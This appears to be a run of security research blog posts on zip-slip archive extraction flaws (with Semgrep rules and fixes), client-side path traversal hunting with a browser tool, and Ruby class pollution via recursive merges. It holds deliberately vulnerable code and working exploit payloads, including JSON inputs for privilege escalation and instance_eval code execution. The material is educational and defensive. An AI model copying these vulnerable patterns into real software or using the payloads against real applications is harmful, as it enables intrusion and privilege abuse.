To demonstrate the vulnerability, I created several proof-of-concept examples in various programming languages. These code snippets showcase vulnerable implementations where the archive extraction is improperly handled.

Python

Combining the zipfile module as the reader with shutil.copyfileobj() as the writer makes the programmer responsible for handling the extraction correctly.

The usage of shutil.copyfileobj() is straightforward: the first argument is the file object for the archive entry whose contents we want to extract, and the second is the file object for the destination file. Since the method receives file objects instead of paths, it cannot know whether the destination lies outside the output directory, which makes the following implementation vulnerable.

import os
import shutil
import zipfile

def unzip1(file_name, output):
    # bad: entry names are joined to the output directory without validation
    with zipfile.ZipFile(file_name, 'r') as zf:
        for filename in zf.namelist():
            # Output
            output_path = os.path.join(output, filename)
            with zf.open(filename) as source:
                with open(output_path, 'wb') as destination:
                    shutil.copyfileobj(source, destination)

unzip1("./payloads/payload.zip", "./test_case")

Running the previous code shows that the zip content (poc.txt) is extracted to the parent folder instead of the test_case folder:

$ python3 zipfile_shutil.py

$ ls test_case
# No output, empty folder

$ ls
payloads  poc.txt  test_case  zipfile_shutil.py

Ruby

Zip::File.open(file_name).extract(entry, file_path)

The extract() method in Ruby’s zip library is used to extract an entry from the archive to the file_path directory. This method is unsafe since it doesn’t remove redundant dots and path separators. It’s the caller’s responsibility to make sure that file_path is safe:

require 'zip'
 
def unzip1(file_name, file_path)
  # bad
  Zip::File.open(file_name) do |zip_file|
    zip_file.each do |entry|
      extraction_path = File.join(file_path, entry.name)
      FileUtils.mkdir_p(File.dirname(extraction_path))
      zip_file.extract(entry, extraction_path) 
    end
  end
end

unzip1('./payloads/payload.zip', './test_case/')

$ ruby zip_unsafe.rb

$ ls test_case
# No output, empty folder

$ ls
payloads  poc.txt  test_case  zip_unsafe.rb

PHP, Swift, JS and Java

All the other cases are documented in Doyensec’s repository, along with the Semgrep rules and the labs.

Unsafe Unpacking Labs

As part of the research, I developed a few web applications that allow users to test whether specific archive extraction implementations are vulnerable to decompression attacks.

RUN: without uploading an archive, the application will extract one of the prebuilt malicious archives. If the user uploads an archive, that archive will be unpacked instead.
Clear TXT Files: the application will remove all the extracted files from the previous archives.
Fetch Directory Contents: the web application will show you both the archive directory (where files are supposed to be extracted) and the current directory (where files are NOT supposed to be extracted).

These web application labs are available for every language except Swift, for which a desktop application is provided instead.

Developing Semgrep Rules for Vulnerability Detection

One of the most efficient ways to detect vulnerabilities in open-source projects is by using static application analysis tools. Semgrep is a fast, open-source, static analysis tool that searches code, finds bugs, and enforces secure guardrails and coding standards.

Semgrep works by scanning source code for specific syntax patterns. Since it supports various programming languages and makes it simple to write custom rules, it was ideal for my research purposes.

In the following example I’m using the Unsafe-Unpacking/Python/PoC/src folder from the GitHub repository, which contains 5 unzipping vulnerabilities. You can run the Semgrep rule by using the following command:

semgrep scan --config=../../rules/zip_shutil_python.yaml

...

┌─────────────────┐
│ 5 Code Findings │
└─────────────────┘

    zipfile_shutil.py
   ❯❯❱ rules.unsafe_unpacking
          Unsafe Zip Unpacking

           13┆ shutil.copyfileobj(source, destination)
            ⋮┆----------------------------------------
           21┆ shutil.copyfileobj(source, destination)
            ⋮┆----------------------------------------
           31┆ shutil.copyfileobj(source, destination)
            ⋮┆----------------------------------------
           41┆ shutil.copyfileobj(source, destination)
            ⋮┆----------------------------------------
           57┆ shutil.copyfileobj(source_file, target_file)

A set of 15 rules can be found in the GitHub repository.

Mitigation

Since in most of the vulnerable implementations the programmer is responsible for sanitizing or validating the output path, they can take two approaches to mitigate the problem.

1. Path Sanitization

To sanitize the path, the filename should be normalized. In the case of Ruby, the method File.basename can be used, which returns only the last component of a path and so converts a path like ../../../../bad.txt to bad.txt.

In the following code, when using File.join to compute the output path, File.basename is called to sanitize the entry filename from the archive, mitigating the vulnerability:

def safe_unzip(file_name, output)
  # good
  Zip::File.open(file_name) do |zip_file|
    zip_file.each do |entry|
      # sanitize the entry path
      file_path = File.join(output, File.basename(entry.name))
      FileUtils.mkdir_p(File.dirname(file_path))
      zip_file.extract(entry, file_path) 
    end
  end
end

The side effect of this mitigation is that the archive’s folder structure is flattened, and all files are extracted to a single folder. Due to this, the solution may not be ideal for many applications.
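
The flattening side effect is easy to see with a short Python sketch that uses posixpath.basename as a stand-in for Ruby's File.basename. The entry names below are made up for illustration.

```python
import posixpath

# Hypothetical archive listing: three different entries, same file name.
entries = ["docs/readme.txt", "src/readme.txt", "../../etc/readme.txt"]

flattened = {}
for name in entries:
    # Keep only the last path component, as the basename mitigation does.
    flattened.setdefault(posixpath.basename(name), []).append(name)

# Any basename claimed by more than one entry would be overwritten on disk.
collisions = {base: names for base, names in flattened.items() if len(names) > 1}
print(collisions)
```

The traversal is neutralized, but all three entries now compete for the same readme.txt, so later entries silently overwrite earlier ones unless the extractor handles duplicates.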

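Another solution is Pathname#cleanpath from pathname, a class in Ruby’s standard library that normalizes a path without touching the filesystem. Note that cleanpath only collapses ../ components it can resolve against earlier components: leading ../ sequences in a relative path are preserved. Anchoring the entry name at the root before cleaning ensures they are dropped:

require 'pathname'

def safe_unzip(file_name, output)
  output += File::SEPARATOR unless output.end_with?(File::SEPARATOR)

  Zip::File.open(file_name) do |zip_file|
    zip_file.each do |entry|
      # Anchor the name at "/" so cleanpath also drops any leading "../"
      rooted_name = File.join(File::SEPARATOR, entry.name)
      sanitized_name = Pathname.new(rooted_name).cleanpath.to_s
      sanitized_path = File.join(output, sanitized_name)

      FileUtils.mkdir_p(File.dirname(sanitized_path))
      zip_file.extract(entry, sanitized_path)
    end
  end
end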

However, if the developer wants to sanitize the path themselves by removing ../ using any kind of replacement, they should make sure that the sanitization is applied repeatedly until there are no ../ sequences left. Otherwise, cases like the following can occur, leading to a bypass:

entry = "..././bad.txt"
sanitized_name = entry.gsub(/(\.\.\/)/, '') # ../bad.txt
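
The same pitfall, and the repeated variant described above, can be sketched in Python. The helper names are hypothetical, and even the looped version only handles ../ sequences: it does nothing about absolute paths or other separators.

```python
def strip_once(name: str) -> str:
    """Single-pass removal: bypassable with nested sequences."""
    return name.replace("../", "")


def strip_until_stable(name: str) -> str:
    """Repeat the removal until no '../' sequence is left."""
    while "../" in name:
        name = name.replace("../", "")
    return name


entry = "..././bad.txt"
print(strip_once(entry))          # ../bad.txt
print(strip_until_stable(entry))  # bad.txt
```

Removing the inner ../ from ..././ leaves a fresh ../ behind, which is why a single pass is not enough.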

2. Path Validation

Before writing the contents of the entry to the destination path, you should ensure that the write path is within the intended destination directory. This can be done by using start_with? to check if the write path starts with the destination path, which prevents directory traversal attacks.

def safe_unzip(file_name, output)
  output += File::SEPARATOR unless output.end_with?(File::SEPARATOR)
  # File.expand_path drops a trailing separator, so re-append it to the prefix
  root = File.join(File.expand_path(output), '')
  # good
  Zip::File.open(file_name) do |zip_file|
    zip_file.each do |entry|
      safe_path = File.expand_path(entry.name, output)

      unless safe_path.start_with?(root)
        raise "Attempted Path Traversal Detected: #{entry.name}"
      end

      FileUtils.mkdir_p(File.dirname(safe_path))
      zip_file.extract(entry, safe_path) 
    end
  end
end

It’s important to note that File.expand_path should be used instead of File.join. File.expand_path converts a relative path into an absolute one and resolves any ../ components, so the prefix check runs against the location that will actually be written.

For example, consider the following secure approach using File.expand_path:

# output = Ruby/PoC/test_case

# path = Ruby/PoC/secret.txt
path = File.expand_path(entry_var, output)

# Check for path traversal
unless path.start_with?(File.expand_path(output))
    raise "Attempted Path Traversal Detected: #{entry_var}"
end

In this case File.expand_path converts path to an absolute path, and the check with start_with correctly verifies whether the extracted file path is within the intended output directory.

On the other hand, if you use File.join to build the output path, it may result in vulnerabilities:

# output = Ruby/PoC/test_case

# path = Ruby/PoC/test_case/../secret.txt
path = File.join(output, entry_var)

# Incorrect check
unless path.start_with?(File.expand_path(output))
    raise "Attempted Path Traversal Detected: #{entry_var}"
end

The check would incorrectly return true even though the path actually leads outside the intended directory (test_case/../secret.txt), allowing an attacker to bypass the validation and perform a path traversal. The takeaway is to always normalize the path before verifying.
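
The difference between checking the joined path and checking the normalized path can be shown with a small Python sketch. posixpath.join and posixpath.normpath stand in for File.join and File.expand_path, and the /srv/app paths are made up for illustration.

```python
import posixpath

output = "/srv/app/test_case"  # hypothetical extraction directory
entry = "../secret.txt"        # attacker-controlled entry name

joined = posixpath.join(output, entry)    # still contains "../"
normalized = posixpath.normpath(joined)   # the location actually written

# Prefix check on the raw join: passes, although the file escapes.
naive_ok = joined.startswith(output + "/")
# Prefix check after normalization: correctly fails.
safe_ok = normalized.startswith(output + "/")

print(joined, naive_ok)
print(normalized, safe_ok)
```

The raw join still begins with the output directory, so the naive check passes, while the normalized path exposes the real destination.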

One detail I missed, which my mentor (Savio Sisco) pointed out, is that in the original safe_method, I didn’t include the following line:

output += File::SEPARATOR unless output.end_with?(File::SEPARATOR)

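Without this line, it was still possible to bypass the start_with? check. The entry cannot reach an arbitrary location this way, but it can still be written outside the intended directory, into any sibling directory whose name begins with the output directory’s name. Keep in mind that File.expand_path strips a trailing separator, so the separator must be present on the prefix that is actually passed to start_with?:

output = "/home/user/output"
entry_name = "../output_bypass/bad.txt"
safe_path = File.expand_path(entry_name, output) # /home/user/output_bypass/bad.txt
safe_path.start_with?(File.expand_path(output)) # true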
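
For comparison, here is a minimal Python sketch of the same validation idea. Instead of a string prefix, it compares whole path components with os.path.commonpath, which sidesteps the missing-separator pitfall. The names is_within and safe_unzip are hypothetical, and the sketch does not address symlink entries or zip bombs.

```python
import io
import os
import shutil
import tempfile
import zipfile


def is_within(base: str, target: str) -> bool:
    """True if target resolves to base itself or to a path below it."""
    base = os.path.realpath(base)
    target = os.path.realpath(target)
    # commonpath compares whole components, so "output_bypass" never
    # matches "output" the way a raw string prefix would.
    return os.path.commonpath([base, target]) == base


def safe_unzip(archive, output: str) -> None:
    """Extract archive into output, rejecting entries that escape it."""
    with zipfile.ZipFile(archive) as zf:
        for info in zf.infolist():
            dest = os.path.join(output, info.filename)
            if not is_within(output, dest):
                raise ValueError(f"Attempted path traversal: {info.filename}")
            if info.is_dir():
                os.makedirs(dest, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(dest), exist_ok=True)
            with zf.open(info) as src, open(dest, "wb") as dst:
                shutil.copyfileobj(src, dst)


# Demo: an entry that targets a sibling directory is rejected.
payload = io.BytesIO()
with zipfile.ZipFile(payload, "w") as zf:
    zf.writestr("../output_bypass/bad.txt", "should never be written")

with tempfile.TemporaryDirectory() as tmp:
    output = os.path.join(tmp, "output")
    os.makedirs(output)
    try:
        safe_unzip(payload, output)
        rejected = False
    except ValueError:
        rejected = True
    print("rejected:", rejected)
```

Comparing components rather than characters is a design choice: it gives the same answer whether or not the caller remembered the trailing separator.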

Conclusions

This research delves into the issue of unsafe archive extraction across various programming languages. The post shows how giving developers more freedom also places the responsibility on them. While manual implementations are important, they can also introduce serious security risks.

Additionally, as security researchers, it is important to understand the root cause of the vulnerability. We hope the Semgrep rules and labs will help others identify, test and mitigate these vulnerabilities. All these resources are available in the Doyensec repository.

Decompression attacks are a broad field of research. While this blog covers some cases related to file extraction, there are still many other attacks, such as zip bombs and symlink attacks, that need to be considered.

A Few Thoughts On My Internship

Although this blog post is not about the internship, I would like to use this opportunity to discuss my experience too.

Two years ago, during my OSWE preparation, I came across Doyensec’s blog posts and used them as a study resource. Months later, I found out they were hiring for an internship, which I thought was an incredible opportunity.

The first time I applied, I received my very first technical challenge — a set of vulnerable code that was a lot of fun to work with if you enjoy reading code. However, I wasn’t able to pass the challenge that year. This year, after two interview rounds with Luca and John, I was finally accepted. The interviews were 360 degree, covering various aspects like how to fix a vulnerability, how computers work, how to make a secure snippet vulnerable, and how to approach threat modeling.

In my first few weeks, I was assigned to some projects with a lot of guidance from other security engineers. I had the chance to talk to them about their work at Doyensec and even chat with one former intern about his internship experience. I learned a lot about the company’s methodology, not only in terms of bug hunting but also in how to be more organized — both in work and in life. Just like many CTF players, I was used to working late into the night, but since I wasn’t working alone on these projects, this habit started to interfere with communication. Initially, it felt strange to open Burp when the sun was still up, but over time, I got used to it. I didn’t realize how much this simple change could improve my productivity until I fully adjusted.

Working on projects with large codebases or complex audits really pushed me to keep searching for bugs, even when it seemed like a dead end. There were times when I got really nervous after days without finding anything of interest. However, Savio was a great help during these moments, advising me to stay calm and stick to a clear methodology instead of letting my nerves drive me to hunt without thinking. Eventually, I was able to find some cool bugs on those projects.

Even though I had very high expectations, this experience definitely lived up to them. A huge thanks to the team, especially Luca and Savio, who took great care of me throughout the entire process.

CSPT the Eval Villain Way!

2024-12-03T00:00:00+01:00

Doyensec’s Maxence Schmitt recently built a playground to go with his CSPT research. In this blog post, we will demonstrate how to find and exploit CSPT bugs with Eval Villain. For this purpose, we will leverage the second challenge of Maxence’s playground.

A step-by-step intro to CSPT with Eval Villain

The next image shows what this methodology yields.

We’ve added some boxes and arrows in orange to better illustrate the current situation. First, Eval Villain saw that part of the page’s path is being used in a fetch request. There, you can plainly see the asdf%2f.. was being URL decoded. Or if you prefer, you can expand the “Encoder function” group to check. Either way, Eval Villain had discovered the CSPT sink.

The second square is on top of a debug statement from evSourcer. This was where the response from the first fetch was being added to Eval Villain’s source bank. As a result, Eval Villain warned us that the _id parameter from the CSPT response had hit another fetch sink. Again, you could get a bit more details from the “Encoder function”.

From the arg[2/2] of each fetch we learned more. The first fetch is a GET that had "redirect":"follow" and the second had "method":"POST". So we controlled the path of a client-side GET request and an open redirect could have sent that request to our own server. The response of our own server would have then been used in the path of an authenticated POST request. This one image shows the entire exploit chain for a CSPT2CSRF exploit.

All of this instrumentation stays around to help us with our exploit. Clicking the provided solution we see the following image. This shows exactly how the exploit works.

Building the picture yourself

Step 0: Tools

You will need Firefox with Eval Villain installed.

You’ll also need the CSPT playground, which runs in Docker via docker compose up. This should bring up a vulnerable web app on http://127.0.0.1:3000/. Read the README.md for more info.

We really do recommend trying this out in the playground. CSPT is one of those bugs that seems easy when you read about it in a blog but feels daunting when you run into it on a test.

Step 1: Finding a CSPT

Log into the playground and visit the “CSPT2CSRF : GET to POST Sink” page. Open the console with ctrl+shift+i on Linux or cmd+option+i on Mac. Ensure Eval Villain is turned on. With the default configuration of Eval Villain, you should just see [EV] Functions hooked for http://127.0.0.1:3000 in the console.

In a real test though, we would see that there is obviously a parameter in the URL path. Eval Villain does not use the path as a source by default, due to false positives. So let’s turn on “Path search” in the “Enable/Disable” pop-up menu (click the Eval Villain logo).

Now, after a page refresh, Eval Villain will tell us about two calls to fetch, each using the path. We don’t know if they are CSPT yet, since we still need to check whether ../ is accepted, but it looks hopeful.

Note: You may only see one fetch here, that is ok.

Step 2: Testing for CSPT

To test for actual CSPT, just add the string %2fasdf%2f.. to the end of the path. This is a handy probe: once decoded, it normalizes back to the original path, so a vulnerable website behaves exactly as before. When you refresh the page you will see this in the console.

It’s that easy to find a CSPT primitive. Had the source been in window.name or a URL parameter, Eval Villain would likely have found it right away.
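
To see why the %2fasdf%2f.. probe leaves a vulnerable page unchanged, here is a small Python sketch of the decode-then-normalize behaviour. The /api/v1/note/ prefix, the note ID and the /api/v1/users target are hypothetical, and posixpath.normpath only approximates the dot-segment removal that the browser performs on the request URL.

```python
import posixpath
from urllib.parse import unquote


def resolved_api_path(prefix: str, note_id: str) -> str:
    """Model a front end that URL-decodes a path parameter, concatenates
    it into an API path, and lets the URL be normalized on request."""
    return posixpath.normpath(prefix + unquote(note_id))


prefix = "/api/v1/note/"  # hypothetical API route
original = resolved_api_path(prefix, "1234")
probe = resolved_api_path(prefix, "1234%2fasdf%2f..")
traversal = resolved_api_path(prefix, "1234%2f..%2f..%2fusers")

print(original)   # /api/v1/note/1234
print(probe)      # /api/v1/note/1234
print(traversal)  # /api/v1/users
```

The probe resolves to the same endpoint as the untouched ID, which is why nothing breaks, while a real payload walks the request to a different endpoint.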

Since the URL path was encoded, Eval Villain gives us an encoder function. You can paste that into your console and use it to try new payloads quickly. The function will automatically apply URL encoding.

With a CSPT primitive, the next step toward exploitation is learning how the response of this request is used. For that, we want to ingest the response as a new source for Eval Villain.

Step 3: Enable `evSourcer`

First you need to enable the evSourcer global in Eval Villain. Go to the configuration page from the pop-up menu and scroll to the globals table. Enable the row that says “evSourcer”. Don’t forget to click save.

Now you can refresh the page and just run evSourcer.toString() in the console to verify the configuration change took.

You can run a quick test to try out the feature. Anything that goes into the second parameter of this function will be put into the Eval Villain source bank. Before using evSinker the string foobar does not generate a warning from the eval sink, afterward it does.

Step 4: Getting the response of the CSPT request into `evSourcer`

So, if we put the response of the CSPT request into evSourcer, Eval Villain can tell us if it hits eval, .innerHTML, fetch or any other sink we have hooked.

To find the response to the CSPT request, we just look at the stack trace Eval Villain gave us.

Here we have highlighted what we think of as the “magic zone”. When you see function names go from minified garbage to big readable strings, that is where you typically want to start. That often means a transition from library code to developer-written code, either forward or back. One of those two functions is probably what we want. Based on context, fetchNoteById is probably returning the info to Ko. So go to the Ko function in the debugger by clicking the link next to it. Once you get there, beautify the code by clicking the {} icon in the lower left of the code pane.

You will see some code like this:

      return (0, t.useEffect) (
        (
          () => {
            r &&
            ot.fetchNoteById(r).then((e => { // <-- fetchNoteById call here
              ot.seenNote(e._id),         // <-- so `e` is probably our JSON response
              n(e)
            })).catch((e => {
              //...

fetchNoteById apparently returns a promise. This makes sense, so we would normally set a breakpoint in order to inspect e and compare it with the response from fetch. Once you validate it, it’s time to instrument.

Right-click on the line number that contains ot.seenNote and click “Add Conditional breakpoint”. Add in the evSinker call, using a name you can recognize as injecting the e variable. The evSinker function always returns false so we will never actually hit this breakpoint.

Notice we have disabled source maps. Source maps can optimize out variables and make debugging harder. Also, Firefox sometimes takes a minute to work through beautifying code and putting breakpoints at the right spot, so just be patient.

Step 5: Refresh the page, check the secondary sink

Now we just refresh the page. Since we used true as the last parameter to evSinker, we will use console debugging to tell us what got injected. Enable “Debug” in the console. We can also enable XHR in the console to see requests and responses there. The requests we are interested in will directly follow Eval Villain output to the console, so they are easy to find. This is what we see.

For the sake of room, we closed the first fetch group. It does show the asdf%2f.. payload hitting fetch. The “XHR” entry we have open there does not show the directory traversal because it was normalized out. Eval Villain makes it easy to find though. The response from the “XHR” can be seen injected in the console debug below it. Then of course Eval Villain is able to spot it hitting the fetch sink.

Step 6: Extra little things

You may notice that there is no arg[2/2] output in the last picture. That argument is a JavaScript object. Eval Villain by default is configured to only look at strings. Open the pop-up menu, click types and enable objects. Then when you refresh the page you can see from the Eval Villain output what options are being passed to fetch.

Step 7: Exploit

The playground makes finding gadgets easy. Just go to the “gadgets” drop down in the page. The real world does not have that, so Burp Suite’s Bambda search seems to be the best bet. See Maxence’s CSPT research for more on that.

BONUS Feature! Eval Villain in Chrome, Electron and maybe Web Views?

Eval Villain is really just a JavaScript function, with config, that Firefox copy/pastes into each page before it loads. Once injected, it just uses the console to log output. So in theory, you could copy paste this same code manually into anywhere JavaScript is accepted.

Eval Villain 1.11 lets you do just that. Go to the configuration page and scroll to the very bottom. You will see a “Copy Injection” button. If you click it, the entire Eval Villain injection, along with the current configuration, will be put into your clipboard.

Using this we have gotten Eval Villain into an instrumented Electron App. The following screen shot shows Eval Villain running from a conditional breakpoint in Burp’s built-in Chrome browser.

Or you can use the HTTP Mock extension in Burp to paste Eval Villain into a web response. We have not tried it yet, but it will be cool to inject it into a Web View on Android using Frida.

Conclusion

Instrumenting the target code does not really take that long. This blog post explained, step by step, how to leverage Eval Villain to find and exploit CSPT vulnerabilities. Even when learning new tricks in a playground, Eval Villain helps us debug little mistakes.

Make sure to use the right tool for the right job. For example, Eval Villain can’t decode everything (check out the fragment challenge). Maxence developed a great Burp Extension for CSPT, but it lacks insight into the DOM. Some other tools are Geko, DOMLogger++ and DOM Invader (enable xhr.open and fetch in sinks). Mix and match what works best for you.

Class Pollution in Ruby: A Deep Dive into Exploiting Recursive Merges

2024-10-02T00:00:00+02:00

Introduction

In this post, we are going to explore a rarely discussed class of vulnerabilities in Ruby, known as class pollution. This concept is inspired by the idea of prototype pollution in JavaScript, where recursive merges are exploited to poison the prototype of objects, leading to unexpected behaviors. This idea was initially discussed in a blog post about prototype pollution in Python, in which the researcher used recursive merging to poison class variables and eventually global variables via the __globals__ attribute.

In Ruby, we can categorize class pollution into three main cases:

Merge on Hashes: In this scenario, class pollution isn’t possible because the merge operation is confined to the hash itself.
Merge on Attributes (Non-Recursive): Here, we can poison the instance variables of an object, potentially replacing methods by injecting return values. This pollution is limited to the object itself and does not affect the class.

current_obj.instance_variable_set("@#{key}", new_object)
current_obj.singleton_class.attr_accessor key

Merge on Attributes (Recursive): In this case, the recursive nature of the merge allows us to escape the object context and poison attributes or methods of parent classes or even unrelated classes, leading to a broader impact on the application.
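
The recursive case is easiest to picture in Python, where the research mentioned in the introduction started. The sketch below is not taken from that post: Person, role and recursive_merge are hypothetical names. It shows how a merge that follows existing attributes can step from an instance into its class through __class__.

```python
class Person:
    role = "user"  # class-level attribute shared by every instance

    def __init__(self, name: str):
        self.name = name


def recursive_merge(src: dict, dst: object) -> None:
    """Naive merge: recurse into existing attributes, otherwise assign."""
    for key, value in src.items():
        if isinstance(value, dict) and hasattr(dst, key):
            # Following "__class__" leaves the instance and lands on the class.
            recursive_merge(value, getattr(dst, key))
        else:
            setattr(dst, key, value)


alice = Person("alice")
bob = Person("bob")

# Attacker-controlled input merged into alice only.
recursive_merge({"name": "mallory", "__class__": {"role": "admin"}}, alice)

print(alice.name)  # mallory
print(bob.role)    # admin
```

Only alice was merged, yet bob sees the poisoned value because the assignment happened on the shared class rather than on the instance.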

Merge on Attributes

Let’s start by examining a code example where we exploit a recursive merge to modify object methods and alter the application’s behavior. This type of pollution is limited to the object itself.

require 'json'


# Base class for both Admin and Regular users
class Person

  attr_accessor :name, :age, :details

  def initialize(name:, age:, details:)
    @name = name
    @age = age
    @details = details
  end

  # Method to merge additional data into the object
  def merge_with(additional)
    recursive_merge(self, additional)
  end

  # Authorize based on the `to_s` method result
  def authorize
    if to_s == "Admin"
      puts "Access granted: #{@name} is an admin."
    else
      puts "Access denied: #{@name} is not an admin."
    end
  end

  # Health check that executes all protected methods using `instance_eval`
  def health_check
    protected_methods().each do |method|
      instance_eval(method.to_s)
    end
  end

  private

  def recursive_merge(original, additional, current_obj = original)
    additional.each do |key, value|

      if value.is_a?(Hash)
        if current_obj.respond_to?(key)
          next_obj = current_obj.public_send(key)
          recursive_merge(original, value, next_obj)
        else
          new_object = Object.new
          current_obj.instance_variable_set("@#{key}", new_object)
          current_obj.singleton_class.attr_accessor key
        end
      else
        current_obj.instance_variable_set("@#{key}", value)
        current_obj.singleton_class.attr_accessor key
      end
    end
    original
  end

  protected

  def check_cpu
    puts "CPU check passed."
  end

  def check_memory
    puts "Memory check passed."
  end
end

# Admin class inherits from Person
class Admin < Person
  def initialize(name:, age:, details:)
    super(name: name, age: age, details: details)
  end

  def to_s
    "Admin"
  end
end

# Regular user class inherits from Person
class User < Person
  def initialize(name:, age:, details:)
    super(name: name, age: age, details: details)
  end

  def to_s
    "User"
  end
end

class JSONMergerApp
  def self.run(json_input)
    additional_object = JSON.parse(json_input)

    # Instantiate a regular user
    user = User.new(
      name: "John Doe",
      age: 30,
      details: {
        "occupation" => "Engineer",
        "location" => {
          "city" => "Madrid",
          "country" => "Spain"
        }
      }
    )


    # Perform a recursive merge, which could override methods
    user.merge_with(additional_object)

    # Authorize the user (privilege escalation vulnerability)
    # ruby class_pollution.rb '{"to_s":"Admin","name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
    user.authorize

    # Execute health check (RCE vulnerability)
    # ruby class_pollution.rb '{"protected_methods":["puts 1"],"name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
    user.health_check

  end
end

if ARGV.length != 1
  puts "Usage: ruby class_pollution.rb 'JSON_STRING'"
  exit
end

json_input = ARGV[0]
JSONMergerApp.run(json_input)

In the provided code, we perform a recursive merge on the attributes of the User object. This allows us to inject or override values, potentially altering the object’s behavior without directly modifying the class definition.

How It Works:

Initialization and Setup:
- The User object is initialized with specific attributes: name, age, and details. These attributes are stored as instance variables within the object.
Merge:
- The merge_with method is called with a JSON input that represents the additional data to be merged into the User object.
Altering Object Behavior:
- By passing carefully crafted JSON data, we can modify or inject new instance variables that affect how the User object behaves.
- For example, in the authorize method, the to_s method determines whether the user is granted admin privileges. By injecting a new to_s method with a return value of "Admin", we can escalate the user’s privileges.
- Similarly, in the health_check method, we can inject arbitrary code execution by overriding methods that are called via instance_eval.

Example Exploits:

Privilege Escalation: ruby class_pollution.rb '{"to_s":"Admin","name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
- This injects a to_s accessor that returns "Admin", granting the user unauthorized admin privileges.
Remote Code Execution: ruby class_pollution.rb '{"protected_methods":["puts 1"],"name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
- This replaces the protected_methods list with attacker-supplied strings, which are then executed by instance_eval, allowing arbitrary code execution.
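The code execution path can be isolated in a few lines. The following is a minimal sketch, not the article's full program: the Checker class and its check_cpu method are hypothetical stand-ins, and the harmless expression "1 + 1" plays the role of the attacker's code.

```ruby
# Hypothetical stand-in for the Person class, reduced to the health check.
class Checker
  # Evaluates the name of every protected method, like health_check above.
  def health_check
    protected_methods.map { |method| instance_eval(method.to_s) }
  end

  protected

  def check_cpu
    :cpu_ok
  end
end

checker = Checker.new
before = checker.health_check

# What the merge does for the key "protected_methods" with an Array value:
# it stores the value and defines an accessor that shadows Object#protected_methods.
checker.instance_variable_set("@protected_methods", ["1 + 1"])
checker.singleton_class.attr_accessor "protected_methods"

# health_check now evaluates the attacker-supplied strings instead.
after = checker.health_check
```

Before the pollution, health_check runs check_cpu. Afterwards it evaluates the injected string, because the accessor defined on the singleton class takes precedence over the built-in protected_methods.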

Limitations:

The aforementioned changes are limited to the specific object instance and do not affect other instances of the same class. This means that while the object’s behavior is altered, other objects of the same class remain unaffected.
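A short sketch makes this limitation concrete. It assumes a stripped-down User class (hypothetical, without the Person parent) and applies the same two calls the merge uses for a non-Hash value.

```ruby
class User
  def to_s
    "User"
  end
end

polluted = User.new
untouched = User.new

# Same two calls the recursive merge performs for the key "to_s".
polluted.instance_variable_set("@to_s", "Admin")
polluted.singleton_class.attr_accessor "to_s"

polluted_role = polluted.to_s
untouched_role = untouched.to_s
```

Because the accessor is defined on the singleton class of one object, only that object reports itself as an admin. The to_s method defined in User is still used by every other instance.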

This example highlights how seemingly innocuous operations like recursive merges can be leveraged to introduce severe vulnerabilities if not properly managed. By understanding these risks, developers can better protect their applications from such exploits.

Real-World Cases

Next, we’ll explore two of the most popular libraries for performing merges in Ruby and see how they might be vulnerable to class pollution. It’s important to note that there are other libraries potentially affected by this class of issues and the overall impact of these vulnerabilities varies.

1. ActiveSupport’s `deep_merge`

ActiveSupport, a built-in component of Ruby on Rails, provides a deep_merge method for hashes. By itself, this method isn’t exploitable given it is limited to hashes. However, if used in conjunction with something like the following, it could become vulnerable:

# Method to merge additional data into the object using ActiveSupport deep_merge
def merge_with(other_object)
  merged_hash = to_h.deep_merge(other_object)

  merged_hash.each do |key, value|
    self.class.attr_accessor key
    instance_variable_set("@#{key}", value)
  end

  self
end

In this example, if the deep_merge is used as shown, we can exploit it similarly to the first example, leading to potentially dangerous changes in the application’s behavior.

2. Hashie

The Hashie library is widely used for creating flexible data structures in Ruby, offering features such as deep_merge. However, unlike the previous example with ActiveSupport, Hashie’s deep_merge method operates directly on object attributes rather than plain hashes. This makes it more susceptible to attribute poisoning.

Hashie has a built-in mechanism that prevents the direct replacement of methods with attributes during a merge. Normally, if you try to override a method with an attribute via deep_merge, Hashie will block the attempt and issue a warning. However, there are specific exceptions to this rule: attributes that end with _, !, or ? can still be merged into the object, even if they conflict with existing methods.

Key Points

Method Protection: Hashie protects method names from being directly overridden by attributes ending in _, !, or ?. This means that, for example, trying to replace a to_s method with a to_s_ attribute will not raise an error, but the method will not be replaced either. The value of to_s_ will not override the method behavior, ensuring that existing method functionality remains intact. This protection mechanism is crucial to maintaining the integrity of methods in Hashie objects.
Special Handling of _: The key vulnerability lies in the handling of _ as an attribute on its own. In Hashie, when you access _, it returns a new Mash object (essentially a temporary object) of the class you are interacting with. This behavior allows attackers to access and work with this new Mash object as if it were a real attribute. While methods cannot be replaced, this feature of accessing the _ attribute can still be exploited to inject or modify values.

For example, by injecting "_": "Admin" into the Mash, an attacker could trick the application into accessing the temporary Mash object created by _, and this object can contain maliciously injected attributes that bypass protections.

A Practical Example

Consider the following code:

require 'json'
require 'hashie'

# Base class for both Admin and Regular users
class Person < Hashie::Mash

  # Method to merge additional data into the object using hashie
  def merge_with(other_object)
    deep_merge!(other_object)
    self
  end

  # Authorize based on to_s
  def authorize
    if _.to_s == "Admin"
      puts "Access granted: #{name} is an admin."
    else
      puts "Access denied: #{name} is not an admin."
    end
  end

end

# Admin class inherits from Person
class Admin < Person
  def to_s
    "Admin"
  end
end

# Regular user class inherits from Person
class User < Person
  def to_s
    "User"
  end
end

class JSONMergerApp
  def self.run(json_input)
    additional_object = JSON.parse(json_input)

    # Instantiate a regular user
    user = User.new({
      name: "John Doe",
      age: 30,
      details: {
        "occupation" => "Engineer",
        "location" => {
          "city" => "Madrid",
          "country" => "Spain"
        }
      }
    })

    # Perform a deep merge, which could override methods
    user.merge_with(additional_object)

    # Authorize the user (privilege escalation vulnerability)
    # Exploit: If we pass {"_": "Admin"} in the JSON, the user will be treated as an admin.
    # Example usage: ruby hashie.rb '{"_": "Admin", "name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
    user.authorize
  end
end

if ARGV.length != 1
  puts "Usage: ruby hashie.rb 'JSON_STRING'"
  exit
end

json_input = ARGV[0]
JSONMergerApp.run(json_input)

In the provided code, we are exploiting Hashie’s handling of _ to manipulate the behavior of the authorization process. When _.to_s is called, instead of returning the method-defined value, it accesses a newly created Mash object, where we can inject the value "Admin". This allows an attacker to bypass method-based authorization checks by injecting data into the temporary Mash object.

